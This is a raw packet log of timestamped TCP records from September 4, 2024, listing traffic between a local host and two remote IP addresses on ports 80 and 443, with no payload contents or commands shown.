Sep 4, 2024 17:37:09.225158930 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.225173950 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.225193977 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.226310968 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.226321936 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.226330996 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.226358891 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.226382971 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.226402044 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.226413012 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.226423025 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.226433992 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.226444960 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.226465940 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.226485014 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.226608038 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.226618052 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.226627111 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.226641893 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.226650000 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.226651907 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.226660013 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.226670027 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.226675034 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.226681948 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.226707935 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.240717888 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.240730047 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.240737915 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.240767956 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.240778923 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.240802050 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.240813971 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.240822077 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.240833998 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.240839958 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.240859032 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.240884066 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.240894079 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.240937948 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.245393991 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.245404959 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.245414019 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.245425940 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.245439053 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.245440006 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.245450974 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.245451927 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.245461941 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.245475054 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.245506048 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.246153116 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.246165037 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.246174097 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.246200085 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.246206045 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.246216059 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.246216059 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.246227026 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.246239901 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.246254921 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.246277094 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.246287107 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.246325970 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.246642113 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.246653080 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.246663094 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.246689081 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.246701956 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.246773005 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.246782064 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.246790886 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.246800900 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.246809006 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.246814013 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.246836901 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.246845007 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.247229099 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.247240067 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.247256041 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.247267962 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.247276068 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.247284889 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.247284889 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.247294903 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.247303963 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.247304916 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.247313023 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.247313976 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.247333050 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.247344971 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.247355938 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.247359037 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.247375011 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.247389078 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.247392893 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.247404099 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.247423887 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.247431040 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.247450113 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.247456074 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.247586966 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.247596979 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.247606039 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.247632980 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.247656107 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.247689962 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.247700930 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.247709990 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.247720003 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.247734070 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.247756004 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.247773886 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.247787952 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.247796059 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.247806072 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.247819901 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.247828007 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.247889996 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.247900963 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.247909069 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.247920036 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.247934103 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.247941017 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.247944117 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.247951031 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.247962952 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.247977972 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.248006105 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.248048067 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.248101950 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.248115063 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.248125076 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.248135090 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.248143911 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.248152018 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.248163939 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.248183012 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.248212099 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.248222113 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.248229980 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.248238087 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.248248100 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.248254061 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.248265982 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.248291969 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.248356104 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.248366117 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.248373985 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.248383045 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.248393059 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.248400927 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.248404980 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.248414993 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.248425961 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.248449087 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.248502970 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.248512030 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.248519897 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.248528957 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.248538971 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.248545885 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.248548985 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.248559952 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.248565912 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.248579979 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.248590946 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.248637915 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.248648882 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.248656034 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.248665094 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.248673916 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.248684883 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.248704910 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.351574898 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.351596117 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.351605892 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.351644993 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.351654053 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.351659060 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.351691961 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.351762056 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.351772070 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.351782084 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.351790905 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.351799965 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.351803064 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.351823092 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.351833105 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.351885080 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.351897955 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.351906061 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.351932049 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.351950884 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.351979017 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.351989985 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.351999044 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.352019072 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.352031946 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.352185965 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.352195978 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.352231979 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.352247953 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.352258921 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.352267027 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.352277040 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.352283955 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.352303982 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.352324963 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.352391958 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.352437019 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.352437019 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.352449894 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.352478027 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.352500916 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.352509975 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.352518082 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.352525949 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.352525949 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.352528095 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.352554083 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.352575064 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.352962017 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.352972031 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.352982044 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.352993011 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.353002071 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.353007078 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.353010893 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.353022099 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.353027105 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.353033066 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.353034019 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.353044987 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.353055000 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.353060961 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.353065968 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.353076935 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.353084087 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.353089094 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.353094101 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.353099108 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.353108883 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.353116035 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.353120089 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.353138924 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.353141069 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.353147984 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.353149891 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.353158951 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.353168011 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.353169918 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.353178978 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.353180885 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.353203058 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.353219032 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.353224039 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.353230000 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.353240967 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.353252888 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.353260994 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.353302956 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.353312969 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.353321075 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.353331089 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.353342056 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.353362083 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.353501081 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.353511095 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.353518963 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.353532076 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.353547096 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.353549004 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.353558064 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.353558064 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.353568077 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.353571892 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.353579044 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.353585005 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.353605032 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.353636026 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.353701115 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.353739977 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.354043961 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.354088068 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.354099989 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.354120970 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.354159117 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.354177952 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.354190111 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.354219913 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.354243040 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.354254961 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.354263067 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.354273081 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.354285955 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.354290009 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.354302883 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.354329109 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.354357004 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.354374886 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.354397058 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.354415894 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.354485989 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.354496956 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.354505062 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.354513884 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.354521990 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.354527950 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.354552031 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.354892969 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.354902983 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.354911089 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.354924917 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.354933977 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.354937077 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.354944944 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.354954004 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.354957104 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.354964018 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.354971886 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.354985952 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.355005026 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.355030060 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.355042934 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.355073929 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.355082035 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.355093956 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.355117083 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.355506897 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.355520964 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.355566978 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.355573893 CEST	443	49727	158.69.225.124	192.168.2.6
